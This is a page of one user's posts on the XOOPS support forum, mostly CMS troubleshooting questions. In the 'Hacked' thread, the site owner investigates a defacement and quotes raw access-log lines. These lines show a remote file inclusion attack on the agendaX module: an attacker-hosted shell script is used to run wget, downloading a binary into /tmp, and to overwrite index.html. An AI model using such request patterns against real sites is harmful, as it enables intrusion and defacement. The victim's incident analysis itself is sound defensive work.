Support Forums - All Posts - XOOPS Web Application System

1

Re: Hacked, where in Xoops did they gain entry???

2005/4/8 5:30
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

Thanks for all the help. Any idea what he did with the following GET command? He executed wget so he was trying to webget something and download it into the directoy, but I can't tell if it failed or not. He/she Ran this same command 3 times. I also searched for any files named r0nin and any connections in those folders and found nothing.

201.255.96.220 - - [06/Apr/2005:20:00:03 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=cd%20/tmp%20wget%20http://users.cjb.net/kbyt3/r0nin HTTP/1.1" 200 1841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Thanks,
andy

2

Re: Hacked, where in Xoops did they gain entry???

2005/4/7 20:29
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

Yeah, that's kind of what I was trying to hint at as far as XOOPS being bypassed. This module was re-enabled to be used for keeping track of raids, and I saw the version but I assumed the updates I did a few months ago from 2.0 to 2.7 fixed it. Note to the wise to never assume.

I disabled, uninstalled the module and then deleted the agendaX directory within a minute of seeing that GET statement. So it's cool from that standpoint. I'll install the newest calendar tonight.

Thanks for all your help guys, and sorry I lost faith and blamed xoops, it must be the horror days from PHPnuke that pushed me towards blaming the engine.

Two things, first everytime I add that command to the .htaccess file I get the 500 error. It's the only thing in the file too so I don't know what's going on with that.
Second, you mentioned server log analysis. Does XOOPS do this or do you mean through the Protect module? I look at the hosting logs about 1 time a week as is.

3

Re: Hacked, where in Xoops did they gain entry???

2005/4/7 19:22
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

Looking through my Raw access logs I found this. So it basically looks like he gained access through the agenda Module.

201.255.96.220 - - [06/Apr/2005:19:56:02 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=echo%20KbyTe%20WaS%20heRe%20[www.kbyte.tk]>../../index.html HTTP/1.1" 200 1848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

The module in question has been shut down. Nifty way of hacking it thought don't you agree?

4

Re: Hacked, where in Xoops did they gain entry???

2005/4/7 13:45
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

Yeap, I shouldn't have pointed the finger at Xoops. Looking through what little logs are available to me it's evident that it was the web server itself which was compromised.

A question about the protector module. In the security advisory part it says you disable global registers in the .htaccess file under your www root, however once I did that I got a 500 forbidden error when trying to open the page. Any ideas?

5

Hacked, where in Xoops did they gain entry???

2005/4/7 5:52
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

I have a site running XOOPS 2.73, which I was planning to update to 2.9 this weekend. It was hacked in the following manner.

In the default HTML folder a index.html file was placed stating "KbyTe WaS heRe [www.kbyte.tk]"

Are there any log files that will point me in the right direction to tracking how they hacked through Xoops? The password for the hosting company is 10 characters long and is a randomly generated password consisting of complex variables. Basically I know the hosting company's side was not hacked, which leaves only XOOPS left.

I know PHPnuke is very vulnerable to exploits, and doing some research I came across information that states they are clan that hack Nuke sites.
Here is the information I found doing a few searches on their clan.
Quote:

You are a part of the mass deface against sites with nuke
For information to visit www.kbyte.tk
To contact myself write to k3kbyte@gmail.com
Dedicated specially to coty and the members of Olimpus Klan and Icenetx Hack Team:
0o_Zyr Golden_o0
0o_Zeus_o0
0o_Adi_o0
0o_Yes_o0
0o_Rey_o0
0o_Snake_o0
0o_Dreamer_o0
0o_Neubius_o0
Gaper
Trew
Brio
Fieldy
Ralf
Cero

Are the same vulnerabilities that exist in Nuke present in xoops?

Any ideas on how I can find where they came in from?

6

How do you prevent Khat from displaying pictures?

2005/3/27 4:55
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

If a user uses the {img}{/img} tages an image displays in the Khat block. How do I disable this functionality without breaking the IMG tags for the rest of the site?

Also, how do I change the font just in Khat?

Thanks!!

7

[FIXED] view account brings up a blank page

2004/11/29 12:49
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

All fixed, thanks for the help.

8

view account brings up a blank page

2004/11/24 19:59
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

When you are logged on and you try to "View Account" a blank webpage shows. If you click on another user you can view their account just fine. You can also view your account just fine unless you are logged in.

Any Ideas? Here are two PHP errors I get when I turn PHP Debug on.

Warning [PHP]: session_start(): Cannot send session cache limiter - headers already sent (output started at /home/public_html/language/english/user.php:176) in file include/common.php line 186
Warning [PHP]: Cannot modify header information - headers already sent by (output started at /home/public_html/language/english/user.php:176) in file user.php line 59

9

Users Can't log on

2004/11/13 15:26
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

You enter your user name and password, and click login, it redirects you to the page that says "Thank you for logging in user X" Then it redirects you to the main page and you aren't logged in.

PHP_debug shows nothing weird in php code going on.

Something of note, When I turn SQL debugging on, no pop up windows opens showing the SQL call, so I wonder if there is a problem with the SQL call in user.php.

How do I get it back to allowing users to log in and actually be logged in?

10

newBB - Poll button not displaying

2004/10/30 18:02
phaelon
Just popping in
Posts: 35
Since: 2004/8/23

I updated newBB from 1.0 to 2.0rc2 like the instructions said, but some of the options no longer display, and switching to a new theme the buttons for reply and edit still look the same as they did when the old theme was being used.

Do I need to dump the newbb files out of my cache?

Stats
Goal:	$100.00
Due Date:	Apr 30
Gross Amount:	$0.00
Net Balance:	$0.00
Left to go:	$100.00

Forum Index

Re: Hacked, where in Xoops did they gain entry???

Re: Hacked, where in Xoops did they gain entry???

Re: Hacked, where in Xoops did they gain entry???

Re: Hacked, where in Xoops did they gain entry???

Hacked, where in Xoops did they gain entry???

How do you prevent Khat from displaying pictures?

[FIXED] view account brings up a blank page

view account brings up a blank page

Users Can't log on

newBB - Poll button not displaying

Login

Search

Recent Posts

Re: Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Rebuilding and Updating a 20 years old Xoops Website from 2.0.18? to 2.5.11

Re: NewBB v 5.1.0 b 6

Re: NewBB v 5.1.0 b 6

NewBB v 5.1.0 b 6

Re: XOOPS 2.5.11 search user is not working

Re: oledrion

Re: oledrion

Re: oledrion

Re: oledrion

Who's Online

Donat-O-Meter

Latest GitHub Commits

{{ record.sha.slice(0, 7) }} - {{ record.commit.message | truncate }}